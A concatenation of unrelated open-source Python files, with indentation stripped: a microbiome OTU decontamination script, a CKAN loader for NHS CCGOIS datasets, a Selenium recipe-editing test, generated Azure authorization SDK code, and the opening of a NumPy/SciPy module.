# write OTU line if present in the filter set
if seq_identifier in filter_set:
output_otu_map_f.write(line)
output_otu_map_f.close()
return
def print_filtered_mothur_counts(mothur_counts_fp, output_counts_fp, filter_set):
output_counts_f = open(output_counts_fp, 'w')
t = 0
for line in open(mothur_counts_fp, 'U'):
seq_identifier = line.strip().split('\t')[0]
# only write this line if the otu has more than n sequences (so
# greater than n tab-separated fields including the otu identifier)
# or if it's the header (first) line
if seq_identifier in filter_set or t == 0:
output_counts_f.write(line)
t += 1
output_counts_f.close()
return
def print_per_library_stats(per_library_stats, per_library_stats_header, lib_ids, dropped_libs=[]):
outline = 'Library\t'
outline += '_reads\t'.join(per_library_stats_header) + '_reads\t'
outline += '_otus\t'.join(per_library_stats_header) + '_otus'
if len(dropped_libs) > 0:
outline += '\tlibrary_discarded'
discard = True
else:
discard = False
outline += '\n'
t = 0
for lib in lib_ids:
outline += lib
for category in per_library_stats_header:
outline += '\t' + str(int(per_library_stats[category][0][t]))
for category in per_library_stats_header:
outline += '\t' + str(int(per_library_stats[category][1][t]))
if discard:
if lib in dropped_libs:
outline += '\tTrue'
else:
outline += '\tFalse'
outline += '\n'
t += 1
return(outline)
def print_otu_disposition(input_seqs, output_dict, hierarchy=[]):
outline = ''
if hierarchy == []:
hierarchy = ['below_relabund_threshold', 'putative_contaminants','reinstated_seqs','ever_good_seqs']
# Subset hierarchy to levels also in output dict:
hierarchy = [x for x in hierarchy if x in output_dict]
# Check that the levels of the hierarchy are non-overlapping:
for x in range(len(hierarchy) - 1):
for y in range(x + 1,len(hierarchy)):
if not output_dict[hierarchy[x]].isdisjoint(output_dict[hierarchy[y]]):
print('warning: non-disjoint sets in the disposition hierarchy')
seqs_left = set(input_seqs)
for seq in input_seqs:
for level in hierarchy:
if seq in output_dict[level]:
outline += '{0}\t{1}\n'.format(seq,level)
break
return(outline)
def print_filtered_seq_headers(seq_headers, output_headers_fp, filter_set):
output_headers_f = open(output_headers_fp, 'w')
for x in seq_headers:
if x in filter_set:
output_headers_f.write('{0}\n'.format(x))
output_headers_f.close()
return
def print_filtered_output(output_method, unfiltered_input, output_dir, output_dict, output_categories=None):
output_fn = 'print_filtered_' + output_method
if not output_categories:
output_categories = output_dict.keys()
if output_method == 'seq_headers':
output_fn = print_filtered_seq_headers
elif output_method == 'mothur_counts':
output_fn = print_filtered_mothur_counts
elif output_method == 'otu_map':
output_fn = print_filtered_otu_map
for category in output_categories:
output_fn(unfiltered_input,
os.path.join(output_dir,
'{0}_{1}.txt'.format(category, output_method)),
output_dict[category])
return
def print_results_file(seq_ids,
output_dict,
output_fp,
stats_header=None,
stats_dict=None,
corr_data_dict=None):
output_f = open(output_fp, 'w')
header = "SeqID"
sorted_categories = sorted(output_dict.keys())
for category in sorted_categories:
header += '\t{0}'.format(category)
if stats_header:
for x in stats_header:
header += '\t{0}'.format(x)
if corr_data_dict:
header += '\t{0}\t{1}'.format('spearman_r','spearman_p')
output_f.write(header + '\n')
for otu in seq_ids:
outline = str(otu)
for category in sorted_categories:
outline += '\t{0}'.format(1 if otu in output_dict[category] else 0)
if stats_header:
t = 0
for x in stats_header:
outline += '\t{0:.3f}'.format(stats_dict[otu][t])
t += 1
if corr_data_dict:
outline += '\t{0:.3f}\t{1:.3f}'.format(
corr_data_dict[otu][0],
corr_data_dict[otu][1])
output_f.write(outline + '\n')
return
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
otu_table_fp = opts.otu_table_fp
mothur_counts_fp = opts.mothur_counts_fp
mapping_fp = opts.mapping_fp
valid_states = opts.valid_states
blank_id_fp = opts.blank_id_fp
contaminant_db_fp = opts.contaminant_db_fp
contaminant_similarity = opts.contaminant_similarity
max_correlation = opts.max_correlation
correlate_header = opts.correlate_header
input_fasta_fp = opts.input_fasta_fp
otu_map_fp = opts.otu_map_fp
output_dir = opts.output_dir
min_relabund_threshold = opts.min_relabund_threshold
prescreen_threshold = opts.prescreen_threshold
removal_stat_blank = opts.removal_stat_blank
removal_stat_sample = opts.removal_stat_sample
removal_differential = opts.removal_differential
reinstatement_stat_sample = opts.reinstatement_stat_sample
reinstatement_stat_blank = opts.reinstatement_stat_blank
reinstatement_differential = opts.reinstatement_differential
reinstatement_sample_number = opts.reinstatement_sample_number
reinstatement_method = opts.reinstatement_method
write_output_seq_lists = opts.write_output_seq_lists
write_filtered_output = opts.write_filtered_output
drop_lib_threshold = opts.drop_lib_threshold
write_per_seq_stats = opts.write_per_seq_stats
write_per_library_stats = opts.write_per_library_stats
write_per_seq_disposition = opts.write_per_seq_disposition
# Make unique seq OTU table (biom file)
# Compute unique seq stats
# output biom file with unique seq stats
# Optionally: make candidate contaminant DB
# remove sequences present at higher abundance in samples
# cluster blanks
# remove low-abundance contaminant OTUs
# Filter by similarity against candidate contaminant DB
# annotate unique seq OTU table with top hit (OTU#, rep seq, ID%)
# make list of seqs @ threshold
# Calculate reinstatement rule for filtered sequences
# Generate lists of seqs failing:
# - unique seq rule
# - hit to contaminant
# - reinstatement after hit
# Make sure passed at least one of an OTU biom or mothur counts table file
input_file_counter = 0
if mothur_counts_fp:
input_file_counter += 1
unique_seq_biom = mothur_counts_to_biom(mothur_counts_fp)
mothur_output = True
print "mothur input"
if otu_table_fp:
input_file_counter += 1
unique_seq_biom = load_table(otu_table_fp)
mothur_output = False
print "BIOM input"
if input_file_counter != 1:
option_parser.error("must provide ONLY ONE of an OTU table biom file or"
"mothur counts table")
# Check to make sure that if blank-based contamination filtering requested,
# all necessary options are specified:
removal_options_counter = 0
if removal_stat_blank:
removal_options_counter += 1
if removal_stat_sample:
removal_options_counter += 1
if removal_differential:
removal_options_counter += 1
if ((removal_options_counter > 0) and (removal_options_counter < 3)):
option_parser.error("Must provide all of "
"removal_stats_blank, "
"removal_stat_sample, and "
"removal_differential, or none.")
elif removal_options_counter == 0:
blank_stats_removal = False
elif removal_options_counter == 3:
blank_stats_removal = True
# If reference-based filtering requested, make sure all necessary options
# have been specified:
if contaminant_db_fp and not input_fasta_fp:
option_parser.error("If specifying ref-based contaminant ID, must "
"also specify path to input sequence fasta")
# If correlation-based filtering requested, make sure correlate data
# are specified
if max_correlation and not correlate_header:
option_parser.error("If specifying maximum Spearman correlation, must "
"also provide map column header for correlate data")
# If sequence reinstatement is requested, make sure all necessary options
# are specified
reinstatement_options_counter = 0
if reinstatement_stat_blank:
reinstatement_options_counter += 1
if reinstatement_stat_sample:
reinstatement_options_counter += 1
if reinstatement_differential:
reinstatement_options_counter += 1
if ((reinstatement_options_counter > 0) and
(reinstatement_options_counter < 3)):
option_parser.error("Must provide all of "
"reinstatement_stats_blank, "
"reinstatement_stat_sample, and "
"reinstatement_differential, or none.")
if ((reinstatement_options_counter == 3 and reinstatement_sample_number)
and not reinstatement_method):
option_parser.error("If providing sample number AND abundance criteria "
"for sequence reinstatement, must also provide "
"a method for combining results.")
if reinstatement_options_counter == 3 or reinstatement_sample_number:
reinstatement = True
else:
reinstatement = False
# get blank sample IDs from mapping file or sample ID list
if mapping_fp and valid_states:
blank_sample_ids = sample_ids_from_metadata_description(
open(mapping_fp, 'U'), valid_states)
blanks = True
elif blank_id_fp is not None:
blank_id_f = open(blank_id_fp, 'Ur')
blank_sample_ids = set([line.strip().split()[0]
for line in blank_id_f
if not line.startswith('#')])
blank_id_f.close()
blanks = True
else:
blanks = False
# Initialize output objets
output_dict = {}
contaminant_types = []
contamination_stats_dict = None
contamination_stats_header = None
corr_data_dict = None
# Do blank-based stats calculations, if not there check to make sure no
# blank-dependent methods are requested:
if blanks:
if prescreen_threshold:
low_contam_libraries = prescreen_libraries(unique_seq_biom,
blank_sample_ids,
removal_stat_sample,
removal_stat_blank,
removal_differential,
prescreen_threshold)
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom,
blank_sample_ids,
exp_sample_ids=low_contam_libraries)
else:
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom, blank_sample_ids)
elif (blank_stats_removal or reinstatement or prescreen_threshold):
option_parser.error("Blank-based filtering requested but no blank"
"samples indicated in mapping file or ID file.")
else:
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom)
seq_ids = unique_seq_biom.ids(axis='observation')
# Do blank-based contaminant identification
if min_relabund_threshold:
output_dict['below_relabund_threshold'] = pick_min_relabund_threshold(
contamination_stats_dict,
contamination_stats_header,
min_relabund_threshold)
if blank_stats_removal:
output_dict['abund_contaminants'] = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
removal_stat_sample,
removal_stat_blank,
removal_differential,
negate=True)
contaminant_types.append('abund_contaminants')
# Do reference-based contaminant identification
if contaminant_db_fp:
output_dict['ref_contaminants'] = pick_ref_contaminants(seq_ids, contaminant_db_fp, input_fasta_fp, contaminant_similarity, output_dir)
contaminant_types.append('ref_contaminants')
# Do spearman correlation based contaminant identification
if max_correlation:
metadata_dict = parse_mapping_file_to_dict(open(mapping_fp, 'U'))[0]
corr_data_dict = {x: float(metadata_dict[x][correlate_header]) for x in metadata_dict}
output_dict['corr_contaminants'], corr_contaminant_dict = pick_corr_contaminants(unique_seq_biom,
corr_data_dict,
max_correlation)
contaminant_types.append('corr_contaminants')
else:
corr_contaminant_dict = None
# Putative contaminants are those that have been identified by any method
output_dict['putative_contaminants'] = set.union(*map(set, [output_dict[x] for x in contaminant_types]))
# If considering low abundance sequences, remove those from consideration as potential contaminants
if 'below_relabund_threshold' in output_dict:
output_dict['putative_contaminants'] = output_dict['putative_contaminants'] - set(output_dict['below_relabund_threshold'])
# Pick abundance-criterion seqs to reinstate
if (reinstatement_stat_blank and reinstatement_stat_sample and reinstatement_differential):
output_dict['abund_reinstated_seqs'] = reinstate_abund_seqs(output_dict['putative_contaminants'],
contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential)
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs']
# Pick incidence-criterion seqs to reinstate
if reinstatement_sample_number:
output_dict['incidence_reinstated_seqs'] = reinstate_incidence_seqs(
output_dict['putative_contaminants'],
unique_seq_biom,
blank_sample_ids,
reinstatement_sample_number)
output_dict['reinstated_seqs'] = output_dict['incidence_reinstated_seqs']
# combine incidence and abundance reinstatements
if reinstatement_sample_number and reinstatement_stat_blank:
if reinstatement_method == "union":
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs'] | output_dict['incidence_reinstated_seqs']
elif reinstatement_method == "intersection":
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs'] & output_dict['incidence_reinstated_seqs']
# make sets for sequence _never_ identified as contaminants:
output_dict['ever_good_seqs'] = set(seq_ids) - output_dict['putative_contaminants']
# If considering low abundance sequences, remove those from consideration as potential contaminants
if 'below_relabund_threshold' in output_dict:
output_dict['ever_good_seqs'] = output_dict['ever_good_seqs'] - set(output_dict['below_relabund_threshold'])
# Make set of good seqs for final filtering
final_good_seqs = output_dict['ever_good_seqs']
# ...and those either never ID'd as contaminants or reinstated:
if reinstatement:
output_dict['all_good_seqs'] = set(output_dict['ever_good_seqs'] | output_dict['reinstated_seqs'])
final_good_seqs = output_dict['all_good_seqs']
# ...and those who remain contaminants after reinstatement:
output_dict['never_good_seqs'] = set(output_dict['putative_contaminants'] - output_dict['reinstated_seqs'])
# print filtered OTU maps if given a QIIME OTU map input
if otu_map_fp:
print_filtered_output('otu_map', otu_map_fp, output_dir, output_dict)
# print filtered Mothur counts tables if given a Mothur counts table input
if mothur_output:
print_filtered_output('mothur_counts', mothur_counts_fp, output_dir, output_dict)
# print filtered seq header files if requested
if write_output_seq_lists:
print_filtered_output('seq_headers', seq_ids, output_dir, output_dict)
# filter final biom file to just good seqs
filtered_biom = unique_seq_biom.filter(lambda val, id_, metadata: id_ in final_good_seqs,
axis='observation', invert=False, inplace=False)
# drop heavily contaminated libraries if requested
if drop_lib_threshold:
dropped_libs = unique_seq_biom.norm(inplace=False).filter(lambda val, id_, metadata: id_ in final_good_seqs,
axis='observation', invert=False, inplace=False).filter(lambda val, id_, metadata: sum(val) >= drop_lib_threshold,
axis='sample', invert=True, inplace=False).ids(axis='sample')
filtered_biom.filter(lambda val, id_, metadata: id_ in dropped_libs,
axis='sample', invert=True, inplace=True)
else:
dropped_libs = []
# print filtered biom/mothur_output if library filtering is requested
if write_filtered_output:
if mothur_output:
output_counts_string = biom_to_mothur_counts(filtered_biom)
with open(os.path.join(output_dir,'decontaminated_table.counts'), "w") as output_counts_file:
output_counts_file.write(output_counts_string)
else:
output_biom_string = filtered_biom.to_json('Filtered by decontaminate.py')
output_biom_string
with open(os.path.join(output_dir,'decontaminated_otu_table.biom'), "w") as output_biom_file:
output_biom_file.write(output_biom_string)
# print per-library stats if requested
if write_per_library_stats:
per_library_stats, per_library_stats_header = calc_per_library_decontam_stats(unique_seq_biom, output_dict)
library_stats_string = print_per_library_stats(per_library_stats, per_library_stats_header, unique_seq_biom.ids(axis='sample'), dropped_libs=dropped_libs)
with open(os.path.join(output_dir,'decontamination_per_library_stats.txt'), "w") as output_stats_file:
output_stats_file.write(library_stats_string)
# print otu by disposition file if requested
if write_per_seq_disposition:
per_seq_disposition = print_otu_disposition(seq_ids, output_dict)
with open(os.path.join(output_dir,'decontamination_per_otu_disposition.txt'), "w") as output_stats_file:
output_stats_file.write(per_seq_disposition)
# print log file / per-seq info
if write_per_seq_stats:
print_results_file(seq_ids,
output_dict,
os.path.join(output_dir,'contamination_summary.txt'),
contamination_stats_header,
contamination_stats_dict,
corr_contaminant_dict)
if __name__ == "__main__":
main()
| tanaes/decontaminate | decontaminate_unitary.py | Python | mit | 40,011 |
"""
Load the CCGOIS datasets into a CKAN instance
"""
import dc
import json
import slugify
import ffs
def make_name_from_title(title):
# For some reason, we're finding duplicate names
name = slugify.slugify(title).lower()[:99]
if not name.startswith('ccgois-'):
name = u"ccgois-{}".format(name)
return name
def load_ccgois(datasets):
for metadata in datasets:
resources = [
dict(
description=r['description'],
name=r['name'],
format=r['filetype'],
url=r['url']
)
for r in metadata['resources']
]
print [r['name'] for r in metadata['resources']]
metadata['title'] = u'CCGOIS - {}'.format(metadata['title'])
metadata['name'] = make_name_from_title(metadata['title'])
print u'Creating {}'.format(metadata['name'])
dc.Dataset.create_or_update(
name=metadata['name'],
title=metadata['title'],
state='active',
license_id='uk-ogl',
notes=metadata['description'],
origin='https://indicators.ic.nhs.uk/webview/',
tags=dc.tags(*metadata['keyword(s)']),
resources=resources,
#frequency=[metadata['frequency'], ],
owner_org='hscic',
extras=[
dict(key='frequency', value=metadata.get('frequency', '')),
dict(key='coverage_start_date', value=metadata['coverage_start_date']),
dict(key='coverage_end_date', value=metadata['coverage_end_date']),
dict(key='domain', value=metadata['domain']),
dict(key='origin', value='HSCIC'),
dict(key='next_version_due', value=metadata['next version due']),
dict(key='nhs_OF_indicators', value=metadata['nhs_of_indicators']),
dict(key='HSCIC_unique_id', value=metadata['unique identifier']),
dict(key='homepage', value=metadata['homepage']),
dict(key='status', value=metadata['status']),
dict(key='language', value=metadata['language']),
dict(key='assurance_level', value=metadata['assurance_level']),
dict(key='release_date', value=metadata['current version uploaded'])
]
)
return
def group_ccgois(datasets):
for metadata in datasets:
dataset_name = make_name_from_title(metadata['title'])
try:
dataset = dc.ckan.action.package_show(id=dataset_name)
except:
print "Failed to find dataset: {}".format(dataset_name)
print "Can't add to group"
continue
if [g for g in dataset.get('groups', []) if g['name'] == 'ccgois']:
print 'Already in group', g['name']
else:
dc.ckan.action.member_create(
id='ccgois',
object=dataset_name,
object_type='package',
capacity='member'
)
return
def main(workspace):
DATA_DIR = ffs.Path(workspace)
datasets = json.load(open(DATA_DIR / 'ccgois_indicators.json'))
dc.ensure_publisher('hscic')
dc.ensure_group('ccgois')
load_ccgois(datasets)
group_ccgois(datasets)
| nhsengland/publish-o-matic | datasets/ccgois/load.py | Python | mit | 3,287 |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from .base import FunctionalTest
class RecipeEditTest(FunctionalTest):
def test_can_add_a_recipe(self):
# Ben goes to the recipe website homepage
self.browser.get(self.server_url)
# He notices the page title mention cookbook
self.assertIn('cookbook', self.browser.title)
# He is invited to enter his name to create his own cookbook or
# view other user's cookbook's
# Ben wants to create his own right now, so he enters his name
# and then clicks the 'get started button'
# TODO -- duplication here. consider refactoring if there is a third instance
username_input = self.browser.find_element_by_id('id_username')
username_input.send_keys('ben')
username_input.send_keys(Keys.ENTER)
# Ben goes to a unique URL which includes his name
ben_url = self.browser.current_url
self.assertRegex(ben_url, '/users/ben.+')
# He is invited to click on a link to add a new recipe
add_recipe_button = self.browser.find_element_by_id('id_add_recipe_button')
self.assertIn('Add recipe', add_recipe_button.text)
# He clicks on the link and new page appears
add_recipe_button.click()
# When he adds a new recipe, he is taken to a new URL
self.assertRegex(self.browser.current_url, '/users/.*/add_recipe')
# He sees a form with a textbox for name, ingredients, directions and servings
# along with a 'cancel' and 'add' button
header_text = self.browser.find_element_by_tag_name('h1').text
self.assertIn('Add Recipe', header_text)
name_textbox = self.browser.find_element_by_id('id_title')
self.assertEqual(name_textbox.get_attribute('placeholder'),
'Enter the title of the recipe')
ingredients_textbox = self.browser.find_element_by_id('id_ingredients')
directions_textbox = self.browser.find_element_by_id('id_directions')
servings_textbox = self.browser.find_element_by_id('id_servings')
add_button = self.browser.find_element_by_id('id_add_button')
# He types in Grilled Halibut with Mango-Avocado Salsa into the textbox for name
name_textbox.send_keys('Grilled Halibut with Mango-Avocado Salsa')
# He types in ingredients:
ingredients_textbox.send_keys('1 medium ripe avocado, peeled and cut into 1/2" dice')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 medium ripe mango, peeled and cut into 1/2" dice')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 cup cherry tomatoes, quartered')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 large fresh basil leaves, thinly sliced')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('3 tablespoons extra-virgin olive oil, divided, plus more for brushing')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('3 tablespoons fresh lime juice, divided')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('Kosher salt and freshly ground black pepper')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 6-ounce halibut or mahi-mahi fillets')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 lime wedges')
# He then types in the following for directions:
directions_textbox.send_keys('Prepare a grill to medium-high heat. Gently combine the avocado, mango, '
'tomatoes, basil, 1 tablespoon oil, and 1 tablespoon lime juice in a large mixing '
'bowl. Season salsa to taste with salt and pepper and set aside at room '
'temperature, gently tossing occasionally.')
directions_textbox.send_keys(Keys.ENTER)
directions_textbox.send_keys('Place fish fillets in a 13x9x2" glass baking dish. Drizzle remaining 2 '
'tablespoon oil and 2 tablespoon lime juice over. Season fish with salt and '
'pepper. Let marinate at room temperature for 10 minutes, turning fish '
'occasionally.')
directions_textbox.send_keys(Keys.ENTER)
directions_textbox.send_keys('Brush grill rack with oil. Grill fish until just opaque in center, about 5 '
'minutes per side. Transfer to plates. Spoon mango-avocado salsa over fish. '
'Squeeze a lime wedge over each and serve.')
# He then types in the servings
servings_textbox.send_keys('7')
# Finally, he clicks the add button
add_button.click()
# He is returned to the main page
# He sees that the recipe appears in the list of recipes
self.check_for_row_in_list_table('Grilled Halibut with Mango-Avocado Salsa')
# Ben then clicks on a recipe to get the full info
recipe_link = self.browser.find_element_by_link_text('Grilled Halibut with Mango-Avocado Salsa')
recipe_link.click()
# He is taken to a new page which has the title in the url
self.assertRegex(self.browser.current_url, '/users/(\S+)/recipe/grilled-halibut-with-mango-avocado-salsa')
# The new page lists all of the ingredients and directions
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('1 medium ripe avocado, peeled and cut into 1/2" dice', page_text)
self.assertIn('Prepare a grill to medium-high heat. Gently combine the avocado, mango, ', page_text)
# He then remembers that the servings are for 8 people and a chili pepper is needed. He clicks
# on the edit button to start editing
edit_button = self.browser.find_element_by_id('id_edit_button')
self.assertIn('Edit', edit_button.text)
edit_button.click()
# The edit page shows the same text as before
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('1 medium ripe avocado, peeled and cut into 1/2" dice', page_text)
self.assertIn('Prepare a grill to medium-high heat. Gently combine the avocado, mango, ', page_text)
# He changes the number of servings from 7 to 8
servings_textbox = self.browser.find_element_by_id('id_servings')
servings_textbox.send_keys(Keys.BACKSPACE)
servings_textbox.send_keys('8')
# He adds chili pepper to the list of ingredients
ingredients_textbox = self.browser.find_element_by_id('id_ingredients')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 chili pepper')
# He adds a note for next time
notes_textbox = self.browser.find_element_by_id('id_notes')
notes_textbox.send_keys("Wasn't that spicy, added a pepper")
# He then clicks the save button
save_button = self.browser.find_element_by_id('id_save_button')
self.assertIn('Save', save_button.text)
save_button.click()
# He is returned to the recipe page
self.assertRegex(self.browser.current_url, '/users/(\S+)/recipe/grilled-halibut-with-mango-avocado-salsa')
# He can see his changes reflected on the page
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('8', page_text)
self.assertNotIn('7', page_text)
self.assertIn('1 chili pepper', page_text)
self.assertIn('added a pepper', page_text)
#self.fail('Finish the test')
# He changes his mind and cancels
# cancel_button = self.browser.find_element_by_name('id_cancel_button')
#cancel_button.click()
# He is returned to the main page
# The number of recipes is still 1
# table = self.browser.find_element_by_id('id_recipe_table')
# rows = table.find_element_by_tag_name('tr')
#self.assertEqual(len(rows), 1)
| benosment/recipes | functional_tests/test_edit_recipe.py | Python | mit | 8,273 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PermissionsOperations:
"""PermissionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.authorization.v2018_01_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_for_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.PermissionGetResult"]:
"""Gets all permissions the caller has for a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PermissionGetResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.authorization.v2018_01_01_preview.models.PermissionGetResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PermissionGetResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_for_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PermissionGetResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Authorization/permissions'} # type: ignore
def list_for_resource(
self,
resource_group_name: str,
resource_provider_namespace: str,
parent_resource_path: str,
resource_type: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.PermissionGetResult"]:
"""Gets all permissions the caller has for a resource.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource.
:type resource_type: str
:param resource_name: The name of the resource to get the permissions for.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PermissionGetResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.authorization.v2018_01_01_preview.models.PermissionGetResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PermissionGetResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_for_resource.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str', skip_quote=True),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PermissionGetResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_for_resource.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/permissions'} # type: ignore
| Azure/azure-sdk-for-python | sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/aio/operations/_permissions_operations.py | Python | mit | 10,365 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from numpy import array, zeros, linspace, meshgrid, ndarray, diag
from numpy import uint8, float64, int8, int0, float128, complex128
from numpy import exp, sqrt, cos, tan, arctan
from numpy import minimum, maximum
from numpy import ceil, floor
from numpy import matrix as npmatrix
from numpy.fft import fft, ifft
from numpy import pi
from scipy.linalg import solve_triangular as solve
from scipy.signal import fftconvolve as conv
from scipy.ndimage import geometric_transform as transform
# We will make use of *reentrant* locks.
from threading import RLock as Lock
from threading import Condition, Thread
# This module is a modification on python's queue module,
# which allows one to interrupt a queue.
import iqueue
# This is a module written to execute code in parallel.
# While python is limited by the Global Interpreter Lock,
# numerical operations on NumPy arrays are generally not
# limited by the GIL.
import parallel
# This module allows the conversion of SAGE symbolic expressions
# to RPN code through the symbolic_to_rpn. RPNProgram is a subclass
# of list that comes equipped with a __call__ method that implements
# execution of the RPN code.
import rpncalc
def _E(m):
return int0(npmatrix(diag((1,) * int(m + 1), k=0)[:, :-1]))
def _X(m):
return int0(npmatrix(diag((1,) * int(m), k=-1)[:, :-1]))
